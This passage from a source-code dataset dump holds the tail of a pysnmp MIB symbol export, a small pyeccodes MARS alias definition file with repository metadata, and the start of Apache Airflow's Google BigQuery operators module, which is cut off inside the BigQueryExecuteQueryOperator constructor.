falconInput2HighLimit2=falconInput2HighLimit2, falconInput4DigAlarm=falconInput4DigAlarm, falconInput8Low2Alarm=falconInput8Low2Alarm, falconInput7Reading=falconInput7Reading, falconInput10Reading=falconInput10Reading, falconRelay5Label=falconRelay5Label, falconInput2LowLimit=falconInput2LowLimit, falconInput3LowAlarm=falconInput3LowAlarm, falconInput1Gain=falconInput1Gain, falconInput3HighLimit=falconInput3HighLimit, falconInputVoltage=falconInputVoltage, falconKeypadName11=falconKeypadName11, falconInput5High2Alarm=falconInput5High2Alarm, falconInput3Hysteresis=falconInput3Hysteresis, falconInput3State=falconInput3State, falconInput8UOM=falconInput8UOM, falconInput1RlyControl=falconInput1RlyControl, falconRelay4Label=falconRelay4Label, falconInput3Reading=falconInput3Reading, falconRelay3Label=falconRelay3Label, falconAlarmsPresent=falconAlarmsPresent, falconInput4Low2Alarm=falconInput4Low2Alarm, falconMIB=falconMIB, falconKeypadName16=falconKeypadName16, falconInput13=falconInput13, falconInput5HighLimit2=falconInput5HighLimit2, products=products, falconInput7High2Alarm=falconInput7High2Alarm, falconInput16=falconInput16, falconInput4LowLimit2=falconInput4LowLimit2, falconInput11RlyControl=falconInput11RlyControl, falconInput12=falconInput12, falconInput20Label=falconInput20Label, falconKeypad=falconKeypad, falconInput6RlyControl=falconInput6RlyControl, falconRelay2=falconRelay2, falconInput1HighAlarm=falconInput1HighAlarm, falconInput2=falconInput2, falconRelay4State=falconRelay4State, falconIdent=falconIdent, falconInput12State=falconInput12State, falconInput16State=falconInput16State, falconInput8Hysteresis=falconInput8Hysteresis, falconInput11DigAlarm=falconInput11DigAlarm, falconInput18Delay=falconInput18Delay, falconKeypadCode4=falconKeypadCode4, falconInput2High2Alarm=falconInput2High2Alarm, falconInput3=falconInput3, falconInput8State=falconInput8State, falconInput11=falconInput11, falconInput19RlyControl=falconInput19RlyControl, 
falconInput8High2Alarm=falconInput8High2Alarm, falconKeypadName5=falconKeypadName5, falconKeypadName14=falconKeypadName14, falconInput1=falconInput1, falconInput8RlyControl=falconInput8RlyControl)
mibBuilder.exportSymbols("RLE-FALCON-MIB", falconInput7LowLimit2=falconInput7LowLimit2, falconRelay4=falconRelay4, falconInput19DigAlarm=falconInput19DigAlarm, falconKeypadName7=falconKeypadName7, falconAlarmEntry=falconAlarmEntry, falconInput14=falconInput14, falconAlarmHistoryTable=falconAlarmHistoryTable, falconInput3RlyControl=falconInput3RlyControl, falconRelay2State=falconRelay2State, falconAlarms=falconAlarms, falconInput6Low2Alarm=falconInput6Low2Alarm, falconInput1HighLimit=falconInput1HighLimit, falconOnBattery=falconOnBattery, falconKeypadCode3=falconKeypadCode3, falconInput4State=falconInput4State, falconInput2Low2Alarm=falconInput2Low2Alarm, falconInput9Reading=falconInput9Reading, falconInput9State=falconInput9State, falconInput4=falconInput4, falconInput9RlyControl=falconInput9RlyControl, falconInput2LowAlarm=falconInput2LowAlarm, falconKeypadName20=falconKeypadName20, falconInput3UOM=falconInput3UOM, falconInput18State=falconInput18State, falconKeypadCode11=falconKeypadCode11, falconLowBatteryAlarm=falconLowBatteryAlarm, falconInput6HighAlarm=falconInput6HighAlarm, falconAlarmHistoryEntries=falconAlarmHistoryEntries, falconKeypadName13=falconKeypadName13, falconInput20Reading=falconInput20Reading, falconInput6HighLimit2=falconInput6HighLimit2, falconInput7HighAlarm=falconInput7HighAlarm, falconInput5LowLimit2=falconInput5LowLimit2, falconInput8DigAlarm=falconInput8DigAlarm, falconRelay5Status=falconRelay5Status, falconInput3Gain=falconInput3Gain, falconInput8LowLimit2=falconInput8LowLimit2, falconInput8Delay=falconInput8Delay, falconInput17Delay=falconInput17Delay, falconRelay6Time=falconRelay6Time, falconInput2Label=falconInput2Label, falconKeypadCode20=falconKeypadCode20, falconInput19Label=falconInput19Label, falconInput15State=falconInput15State, falconInput1Offset=falconInput1Offset, falconInput5LowAlarm=falconInput5LowAlarm, falconInput12Label=falconInput12Label, falconInput13DigAlarm=falconInput13DigAlarm, 
falconInput17Reading=falconInput17Reading, falconIdentSpecific=falconIdentSpecific, falconInput20=falconInput20, falconInput6Offset=falconInput6Offset, falconAlarmHistoryText=falconAlarmHistoryText, falconDoorAlarmBypass=falconDoorAlarmBypass, falconInput6High2Alarm=falconInput6High2Alarm, falconInput1Hysteresis=falconInput1Hysteresis, falconRelay1Status=falconRelay1Status, falconKeypadName4=falconKeypadName4, falconInput4HighAlarm=falconInput4HighAlarm, falconInput5=falconInput5, falconInput15RlyControl=falconInput15RlyControl, falconRelay1=falconRelay1, falconInput3Offset=falconInput3Offset, falconRelay4Time=falconRelay4Time, falconRelay3Status=falconRelay3Status, falconAlarmTable=falconAlarmTable, falconInput15Reading=falconInput15Reading, falconInput9Delay=falconInput9Delay, falconInput1High2Alarm=falconInput1High2Alarm, falconInput4Label=falconInput4Label, falconAlarmDescr=falconAlarmDescr, falconInput3HighLimit2=falconInput3HighLimit2, falconInput18DigAlarm=falconInput18DigAlarm, falconInput11Label=falconInput11Label, falconInput19=falconInput19, falconInput7HighLimit2=falconInput7HighLimit2, falconKeypadCode9=falconKeypadCode9, falconInput8HighLimit=falconInput8HighLimit, falconInput1HighLimit2=falconInput1HighLimit2, falconKeypadCode6=falconKeypadCode6, falconKeypadName6=falconKeypadName6, falconInput1Label=falconInput1Label, falconRelay1Time=falconRelay1Time, falconRelay6=falconRelay6, falconAccessDenied=falconAccessDenied, falconInput3Label=falconInput3Label, falconInput14DigAlarm=falconInput14DigAlarm, rle=rle, falconInput2Offset=falconInput2Offset, falconInput2LowLimit2=falconInput2LowLimit2, falconInput5LowLimit=falconInput5LowLimit, falconInput16Delay=falconInput16Delay, falconInput8=falconInput8, falconInput15Delay=falconInput15Delay, falconInput9=falconInput9, falconRelay2Status=falconRelay2Status)
| true | true |
1c2cbe68ab282adbdc53a934704dba7d236fc71d | 177 | py | Python | pyeccodes/defs/mars/grib_enfh_icp_def.py | ecmwf/pyeccodes | dce2c72d3adcc0cb801731366be53327ce13a00b | [
"Apache-2.0"
] | 7 | 2020-04-14T09:41:17.000Z | 2021-08-06T09:38:19.000Z | pyeccodes/defs/mars/grib_enfh_pf_def.py | ecmwf/pyeccodes | dce2c72d3adcc0cb801731366be53327ce13a00b | [
"Apache-2.0"
] | null | null | null | pyeccodes/defs/mars/grib_enfh_pf_def.py | ecmwf/pyeccodes | dce2c72d3adcc0cb801731366be53327ce13a00b | [
"Apache-2.0"
] | 3 | 2020-04-30T12:44:48.000Z | 2020-12-15T08:40:26.000Z | import pyeccodes.accessors as _
def load(h):
    """Register MARS key aliases on the handle ``h``.

    Each ``alias`` call presumably maps a ``mars.*`` request key onto an
    existing GRIB key of the handle — confirm against pyeccodes accessors.
    """
    h.alias('mars.hdate', 'dataDate')
    h.alias('mars.date', 'referenceDate')
    h.alias('mars.number', 'perturbationNumber')
| 19.666667 | 48 | 0.672316 | import pyeccodes.accessors as _
def load(h):
    """Register MARS key aliases on the handle ``h``."""
    alias_pairs = (
        ('mars.hdate', 'dataDate'),
        ('mars.date', 'referenceDate'),
        ('mars.number', 'perturbationNumber'),
    )
    for mars_key, grib_key in alias_pairs:
        h.alias(mars_key, grib_key)
| true | true |
1c2cbedcb423f26700da2934e9ec94f26ab289ff | 99,243 | py | Python | airflow/providers/google/cloud/operators/bigquery.py | pchico83/airflow | e3e8f502fe318862fed0795141e3d8281e283e6b | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 | 2020-05-28T13:30:38.000Z | 2020-05-28T13:30:38.000Z | airflow/providers/google/cloud/operators/bigquery.py | Sri-nidhi/Airflow | 86ad628158eb728e56c817eea2bea4ddcaa571c2 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | airflow/providers/google/cloud/operators/bigquery.py | Sri-nidhi/Airflow | 86ad628158eb728e56c817eea2bea4ddcaa571c2 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 2 | 2021-05-05T07:36:36.000Z | 2021-11-10T17:32:39.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
"""This module contains Google BigQuery operators."""
import enum
import hashlib
import json
import re
import uuid
import warnings
from datetime import datetime
from typing import Any, Dict, Iterable, List, Optional, Sequence, Set, SupportsAbs, Union
import attr
from google.api_core.exceptions import Conflict
from google.cloud.bigquery import TableReference
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator, BaseOperatorLink
from airflow.models.taskinstance import TaskInstance
from airflow.operators.sql import SQLCheckOperator, SQLIntervalCheckOperator, SQLValueCheckOperator
from airflow.providers.google.cloud.hooks.bigquery import BigQueryHook, BigQueryJob
from airflow.providers.google.cloud.hooks.gcs import GCSHook, _parse_gcs_url
from airflow.utils.decorators import apply_defaults
# Format string for a deep link to a job page in the BigQuery console.
BIGQUERY_JOB_DETAILS_LINK_FMT = "https://console.cloud.google.com/bigquery?j={job_id}"
# Warning text shared by every operator that still accepts the legacy
# ``bigquery_conn_id`` argument in place of ``gcp_conn_id``.
_DEPRECATION_MSG = (
    "The bigquery_conn_id parameter has been deprecated. You should pass the gcp_conn_id parameter."
)
class BigQueryUIColors(enum.Enum):
    """Hex color codes used as ``ui_color`` by the BigQuery operators."""

    CHECK = "#C0D7FF"  # check-style operators
    QUERY = "#A1BBFF"  # query / data-fetching operators
    TABLE = "#81A0FF"  # table-level operators
    DATASET = "#5F86FF"  # dataset-level operators
class BigQueryConsoleLink(BaseOperatorLink):
    """Operator extra link pointing at the BigQuery console page of a job.

    The job id is read from the XCom value the operator pushed under the
    ``job_id`` key; an empty string is returned when nothing was pushed.
    """

    name = 'BigQuery Console'

    def get_link(self, operator, dttm):
        task_instance = TaskInstance(task=operator, execution_date=dttm)
        job_id = task_instance.xcom_pull(task_ids=operator.task_id, key='job_id')
        if not job_id:
            return ''
        return BIGQUERY_JOB_DETAILS_LINK_FMT.format(job_id=job_id)
@attr.s(auto_attribs=True)
class BigQueryConsoleIndexableLink(BaseOperatorLink):
    """Operator extra link for the n-th BigQuery job started by one operator.

    Used when a single operator runs several statements and therefore pushes
    a *list* of job ids to XCom under the ``job_id`` key.
    """

    # Zero-based position of the job id to link to within the pushed list.
    index: int = attr.ib()

    @property
    def name(self) -> str:
        # Humans count from 1; the stored index is zero-based.
        return f'BigQuery Console #{self.index + 1}'

    def get_link(self, operator: BaseOperator, dttm: datetime):
        ti = TaskInstance(task=operator, execution_date=dttm)
        job_ids = ti.xcom_pull(task_ids=operator.task_id, key='job_id')
        if not job_ids:
            return None
        # Bug fix: the previous guard ``len(job_ids) < self.index`` was off by
        # one — when len(job_ids) == self.index it fell through and
        # ``job_ids[self.index]`` raised IndexError instead of returning None.
        if self.index >= len(job_ids):
            return None
        return BIGQUERY_JOB_DETAILS_LINK_FMT.format(job_id=job_ids[self.index])
class _BigQueryDbHookMixin:
    def get_db_hook(self) -> BigQueryHook:
        """Build a :class:`BigQueryHook` from this operator's connection settings."""
        hook_kwargs = {
            'gcp_conn_id': self.gcp_conn_id,
            'use_legacy_sql': self.use_legacy_sql,
            'location': self.location,
            'impersonation_chain': self.impersonation_chain,
            'labels': self.labels,
        }
        return BigQueryHook(**hook_kwargs)
class BigQueryCheckOperator(_BigQueryDbHookMixin, SQLCheckOperator):
    """Run a SQL statement on BigQuery and fail unless every returned value is truthy.

    The statement must yield a single row.  Every value of that row is passed
    through Python ``bool``; the check fails as soon as one of them is falsy
    (``False``, ``0``, ``""``, ``[]``, ``{}``).  A query such as
    ``SELECT COUNT(*) FROM foo`` therefore fails exactly when the count is 0,
    while richer queries can compare row counts with an upstream table or
    guard a metric against historical bounds.  Placed on the critical path of
    a DAG this acts as a data-quality gate; placed on a side branch it merely
    alerts without blocking downstream progress.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryCheckOperator`

    :param sql: the sql to be executed
    :type sql: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param bigquery_conn_id: (Deprecated) The connection ID used to connect to
        Google Cloud; pass ``gcp_conn_id`` instead.
    :type bigquery_conn_id: str
    :param use_legacy_sql: Whether to use legacy SQL (true) or standard SQL (false).
    :type use_legacy_sql: bool
    :param location: The geographic location of the job. See details at:
        https://cloud.google.com/bigquery/docs/locations#specifying_your_location
    :type location: str
    :param impersonation_chain: Optional service account to impersonate using
        short-term credentials, or a chained list of accounts required to get
        the access_token of the last account in the list, which will be
        impersonated in the request.  A string identity must grant the
        originating account the Service Account Token Creator IAM role; in a
        sequence, each identity must grant that role to the one directly
        preceding it (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :param labels: a dictionary containing labels for the table, passed to BigQuery
    :type labels: dict
    """

    template_fields = (
        'sql',
        'gcp_conn_id',
        'impersonation_chain',
        'labels',
    )
    template_ext = ('.sql',)
    ui_color = BigQueryUIColors.CHECK.value

    @apply_defaults
    def __init__(
        self,
        *,
        sql: str,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        use_legacy_sql: bool = True,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        labels: Optional[dict] = None,
        **kwargs,
    ) -> None:
        super().__init__(sql=sql, **kwargs)
        # Honour the deprecated alias while steering callers to ``gcp_conn_id``.
        if bigquery_conn_id:
            warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
            gcp_conn_id = bigquery_conn_id
        self.sql = sql
        self.gcp_conn_id = gcp_conn_id
        self.use_legacy_sql = use_legacy_sql
        self.location = location
        self.labels = labels
        self.impersonation_chain = impersonation_chain
class BigQueryValueCheckOperator(_BigQueryDbHookMixin, SQLValueCheckOperator):
    """Run a SQL statement on BigQuery and check its result against ``pass_value``.

    The comparison itself is inherited from
    :class:`~airflow.operators.sql.SQLValueCheckOperator`; this subclass only
    wires it to a BigQuery connection.  ``tolerance`` is forwarded unchanged
    to the parent operator.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryValueCheckOperator`

    :param sql: the sql to be executed
    :type sql: str
    :param pass_value: expected value the query result is checked against (templated)
    :type pass_value: Any
    :param tolerance: optional tolerance forwarded to ``SQLValueCheckOperator``
    :type tolerance: Any
    :param use_legacy_sql: Whether to use legacy SQL (true) or standard SQL (false).
    :type use_legacy_sql: bool
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param bigquery_conn_id: (Deprecated) The connection ID used to connect to
        Google Cloud; pass ``gcp_conn_id`` instead.
    :type bigquery_conn_id: str
    :param location: The geographic location of the job. See details at:
        https://cloud.google.com/bigquery/docs/locations#specifying_your_location
    :type location: str
    :param impersonation_chain: Optional service account to impersonate using
        short-term credentials, or a chained list of accounts required to get
        the access_token of the last account in the list, which will be
        impersonated in the request.  A string identity must grant the
        originating account the Service Account Token Creator IAM role; in a
        sequence, each identity must grant that role to the one directly
        preceding it (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :param labels: a dictionary containing labels for the table, passed to BigQuery
    :type labels: dict
    """

    template_fields = (
        'sql',
        'gcp_conn_id',
        'pass_value',
        'impersonation_chain',
        'labels',
    )
    template_ext = ('.sql',)
    ui_color = BigQueryUIColors.CHECK.value

    @apply_defaults
    def __init__(
        self,
        *,
        sql: str,
        pass_value: Any,
        tolerance: Any = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        use_legacy_sql: bool = True,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        labels: Optional[dict] = None,
        **kwargs,
    ) -> None:
        super().__init__(sql=sql, pass_value=pass_value, tolerance=tolerance, **kwargs)
        # Honour the deprecated alias while steering callers to ``gcp_conn_id``.
        if bigquery_conn_id:
            warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
            gcp_conn_id = bigquery_conn_id
        self.gcp_conn_id = gcp_conn_id
        self.use_legacy_sql = use_legacy_sql
        self.location = location
        self.labels = labels
        self.impersonation_chain = impersonation_chain
class BigQueryIntervalCheckOperator(_BigQueryDbHookMixin, SQLIntervalCheckOperator):
    """Check that today's metric values stay within tolerance of ``days_back`` ago.

    For the metrics named in ``metrics_thresholds`` a query of the form ::

        SELECT {metrics_threshold_dict_key} FROM {table}
        WHERE {date_filter_column}=<date>

    is run for both dates; the ratio between the two results must stay within
    the configured threshold (the comparison is implemented by
    :class:`~airflow.operators.sql.SQLIntervalCheckOperator`).

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryIntervalCheckOperator`

    :param table: the table name
    :type table: str
    :param metrics_thresholds: a dictionary of ratios indexed by metrics, for
        example 'COUNT(*)': 1.5 would require a 50 percent or less difference
        between the current day, and the prior days_back.
    :type metrics_thresholds: dict
    :param date_filter_column: column used to filter both dates (defaults to ``ds``)
    :type date_filter_column: str
    :param days_back: number of days between ds and the ds we want to check
        against. Defaults to 7 days
    :type days_back: int
    :param use_legacy_sql: Whether to use legacy SQL (true) or standard SQL (false).
    :type use_legacy_sql: bool
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param bigquery_conn_id: (Deprecated) The connection ID used to connect to
        Google Cloud; pass ``gcp_conn_id`` instead.
    :type bigquery_conn_id: str
    :param location: The geographic location of the job. See details at:
        https://cloud.google.com/bigquery/docs/locations#specifying_your_location
    :type location: str
    :param impersonation_chain: Optional service account to impersonate using
        short-term credentials, or a chained list of accounts required to get
        the access_token of the last account in the list, which will be
        impersonated in the request.  A string identity must grant the
        originating account the Service Account Token Creator IAM role; in a
        sequence, each identity must grant that role to the one directly
        preceding it (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :param labels: a dictionary containing labels for the table, passed to BigQuery
    :type labels: dict
    """

    template_fields = (
        'table',
        'gcp_conn_id',
        'sql1',
        'sql2',
        'impersonation_chain',
        'labels',
    )
    ui_color = BigQueryUIColors.CHECK.value

    @apply_defaults
    def __init__(
        self,
        *,
        table: str,
        metrics_thresholds: dict,
        date_filter_column: str = 'ds',
        days_back: SupportsAbs[int] = -7,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        use_legacy_sql: bool = True,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        labels: Optional[Dict] = None,
        **kwargs,
    ) -> None:
        super().__init__(
            table=table,
            metrics_thresholds=metrics_thresholds,
            date_filter_column=date_filter_column,
            days_back=days_back,
            **kwargs,
        )
        # Honour the deprecated alias while steering callers to ``gcp_conn_id``.
        if bigquery_conn_id:
            warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
            gcp_conn_id = bigquery_conn_id
        self.gcp_conn_id = gcp_conn_id
        self.use_legacy_sql = use_legacy_sql
        self.location = location
        self.labels = labels
        self.impersonation_chain = impersonation_chain
class BigQueryGetDataOperator(BaseOperator):
    """
    Fetches the data from a BigQuery table (alternatively fetch data for selected columns)
    and returns data in a python list. The number of elements in the returned list will
    be equal to the number of rows fetched. Each element in the list will again be a list
    where element would represent the columns values for that row.

    **Example Result**: ``[['Tony', '10'], ['Mike', '20'], ['Steve', '15']]``

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryGetDataOperator`

    .. note::
        If you pass fields to ``selected_fields`` which are in different order than the
        order of columns already in
        BQ table, the data will still be in the order of BQ table.
        For example if the BQ table has 3 columns as
        ``[A,B,C]`` and you pass 'B,A' in the ``selected_fields``
        the data would still be of the form ``'A,B'``.

    **Example**: ::

        get_data = BigQueryGetDataOperator(
            task_id='get_data_from_bq',
            dataset_id='test_dataset',
            table_id='Transaction_partitions',
            max_results=100,
            selected_fields='DATE',
            gcp_conn_id='airflow-conn-id'
        )

    :param dataset_id: The dataset ID of the requested table. (templated)
    :type dataset_id: str
    :param table_id: The table ID of the requested table. (templated)
    :type table_id: str
    :param max_results: The maximum number of records (rows) to be fetched
        from the table. (templated)
    :type max_results: int
    :param selected_fields: List of fields to return (comma-separated). If
        unspecified, all fields are returned.
    :type selected_fields: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param bigquery_conn_id: (Deprecated) The connection ID used to connect to
        Google Cloud; pass ``gcp_conn_id`` instead.
    :type bigquery_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of authority,
        if any. For this to work, the service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param location: The location used for the operation.
    :type location: str
    :param impersonation_chain: Optional service account to impersonate using
        short-term credentials, or a chained list of accounts required to get
        the access_token of the last account in the list, which will be
        impersonated in the request.  A string identity must grant the
        originating account the Service Account Token Creator IAM role; in a
        sequence, each identity must grant that role to the one directly
        preceding it (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = (
        'dataset_id',
        'table_id',
        'max_results',
        'selected_fields',
        'impersonation_chain',
    )
    ui_color = BigQueryUIColors.QUERY.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        table_id: str,
        max_results: int = 100,
        selected_fields: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        if bigquery_conn_id:
            # Consistency fix: use the module-wide _DEPRECATION_MSG (identical
            # text) instead of a locally duplicated message string, matching
            # the other BigQuery operators in this module.
            warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
            gcp_conn_id = bigquery_conn_id
        self.dataset_id = dataset_id
        self.table_id = table_id
        # ``max_results`` is a templated field and may arrive as a string.
        self.max_results = int(max_results)
        self.selected_fields = selected_fields
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.location = location
        self.impersonation_chain = impersonation_chain

    def execute(self, context) -> list:
        """Fetch up to ``max_results`` rows and return them as lists of values."""
        self.log.info(
            'Fetching Data from %s.%s max results: %s', self.dataset_id, self.table_id, self.max_results
        )
        # NOTE(review): the hook is addressed via its legacy ``bigquery_conn_id``
        # kwarg here — confirm against BigQueryHook's signature before renaming.
        hook = BigQueryHook(
            bigquery_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        rows = hook.list_rows(
            dataset_id=self.dataset_id,
            table_id=self.table_id,
            max_results=self.max_results,
            selected_fields=self.selected_fields,
            location=self.location,
        )
        self.log.info('Total extracted rows: %s', len(rows))
        # Flatten each Row object into a plain list of its column values.
        return [row.values() for row in rows]
# pylint: disable=too-many-instance-attributes
class BigQueryExecuteQueryOperator(BaseOperator):
    """
    Executes BigQuery SQL queries in a specific BigQuery database.
    This operator does not assert idempotency.

    :param sql: the sql code to be executed (templated)
    :type sql: Can receive a str representing a sql statement,
        a list of str (sql statements), or reference to a template file.
        Template reference are recognized by str ending in '.sql'.
    :param destination_dataset_table: A dotted
        ``(<project>.|<project>:)<dataset>.<table>`` that, if set, will store the results
        of the query. (templated)
    :type destination_dataset_table: str
    :param write_disposition: Specifies the action that occurs if the destination table
        already exists. (default: 'WRITE_EMPTY')
    :type write_disposition: str
    :param create_disposition: Specifies whether the job is allowed to create new tables.
        (default: 'CREATE_IF_NEEDED')
    :type create_disposition: str
    :param allow_large_results: Whether to allow large results.
    :type allow_large_results: bool
    :param flatten_results: If true and query uses legacy SQL dialect, flattens
        all nested and repeated fields in the query results. ``allow_large_results``
        must be ``true`` if this is set to ``false``. For standard SQL queries, this
        flag is ignored and results are never flattened.
    :type flatten_results: bool
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
        This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
    :type bigquery_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of authority,
        if any. For this to work, the service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param udf_config: The User Defined Function configuration for the query.
        See https://cloud.google.com/bigquery/user-defined-functions for details.
    :type udf_config: list
    :param use_legacy_sql: Whether to use legacy SQL (true) or standard SQL (false).
    :type use_legacy_sql: bool
    :param maximum_billing_tier: Positive integer that serves as a multiplier
        of the basic price.
        Defaults to None, in which case it uses the value set in the project.
    :type maximum_billing_tier: int
    :param maximum_bytes_billed: Limits the bytes billed for this job.
        Queries that will have bytes billed beyond this limit will fail
        (without incurring a charge). If unspecified, this will be
        set to your project default.
    :type maximum_bytes_billed: float
    :param api_resource_configs: a dictionary that contain params
        'configuration' applied for Google BigQuery Jobs API:
        https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs
        for example, {'query': {'useQueryCache': False}}. You could use it
        if you need to provide some params that are not supported by BigQueryOperator
        like args.
    :type api_resource_configs: dict
    :param schema_update_options: Allows the schema of the destination
        table to be updated as a side effect of the load job.
    :type schema_update_options: Optional[Union[list, tuple, set]]
    :param query_params: a list of dictionary containing query parameter types and
        values, passed to BigQuery. The structure of dictionary should look like
        'queryParameters' in Google BigQuery Jobs API:
        https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs.
        For example, [{ 'name': 'corpus', 'parameterType': { 'type': 'STRING' },
        'parameterValue': { 'value': 'romeoandjuliet' } }]. (templated)
    :type query_params: list
    :param labels: a dictionary containing labels for the job/query,
        passed to BigQuery
    :type labels: dict
    :param priority: Specifies a priority for the query.
        Possible values include INTERACTIVE and BATCH.
        The default value is INTERACTIVE.
    :type priority: str
    :param time_partitioning: configure optional time partitioning fields i.e.
        partition by field, type and expiration as per API specifications.
    :type time_partitioning: dict
    :param cluster_fields: Request that the result of this query be stored sorted
        by one or more columns. BigQuery supports clustering for both partitioned and
        non-partitioned tables. The order of columns given determines the sort order.
    :type cluster_fields: list[str]
    :param location: The geographic location of the job. Required except for
        US and EU. See details at
        https://cloud.google.com/bigquery/docs/locations#specifying_your_location
    :type location: str
    :param encryption_configuration: [Optional] Custom encryption configuration (e.g., Cloud KMS keys).
        **Example**: ::

            encryption_configuration = {
                "kmsKeyName": "projects/testp/locations/us/keyRings/test-kr/cryptoKeys/test-key"
            }
    :type encryption_configuration: dict
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = (
        'sql',
        'destination_dataset_table',
        'labels',
        'query_params',
        'impersonation_chain',
    )
    template_ext = ('.sql',)
    ui_color = BigQueryUIColors.QUERY.value

    @property
    def operator_extra_links(self):
        """Return operator extra links"""
        if isinstance(self.sql, str):
            return (BigQueryConsoleLink(),)
        # One console link per statement when a list of SQL strings is given.
        return (BigQueryConsoleIndexableLink(i) for i, _ in enumerate(self.sql))

    # pylint: disable=too-many-arguments, too-many-locals
    @apply_defaults
    def __init__(
        self,
        *,
        sql: Union[str, Iterable],
        destination_dataset_table: Optional[str] = None,
        write_disposition: str = 'WRITE_EMPTY',
        allow_large_results: Optional[bool] = False,
        flatten_results: Optional[bool] = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        udf_config: Optional[list] = None,
        use_legacy_sql: bool = True,
        maximum_billing_tier: Optional[int] = None,
        maximum_bytes_billed: Optional[float] = None,
        create_disposition: str = 'CREATE_IF_NEEDED',
        schema_update_options: Optional[Union[list, tuple, set]] = None,
        query_params: Optional[list] = None,
        labels: Optional[dict] = None,
        priority: str = 'INTERACTIVE',
        time_partitioning: Optional[dict] = None,
        api_resource_configs: Optional[dict] = None,
        cluster_fields: Optional[List[str]] = None,
        location: Optional[str] = None,
        encryption_configuration: Optional[dict] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Honour the deprecated bigquery_conn_id alias.
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
            )
            gcp_conn_id = bigquery_conn_id

        # The whole operator is deprecated; warn unconditionally at construction.
        warnings.warn(
            "This operator is deprecated. Please use `BigQueryInsertJobOperator`.",
            DeprecationWarning,
        )

        self.sql = sql
        self.destination_dataset_table = destination_dataset_table
        self.write_disposition = write_disposition
        self.create_disposition = create_disposition
        self.allow_large_results = allow_large_results
        self.flatten_results = flatten_results
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.udf_config = udf_config
        self.use_legacy_sql = use_legacy_sql
        self.maximum_billing_tier = maximum_billing_tier
        self.maximum_bytes_billed = maximum_bytes_billed
        self.schema_update_options = schema_update_options
        self.query_params = query_params
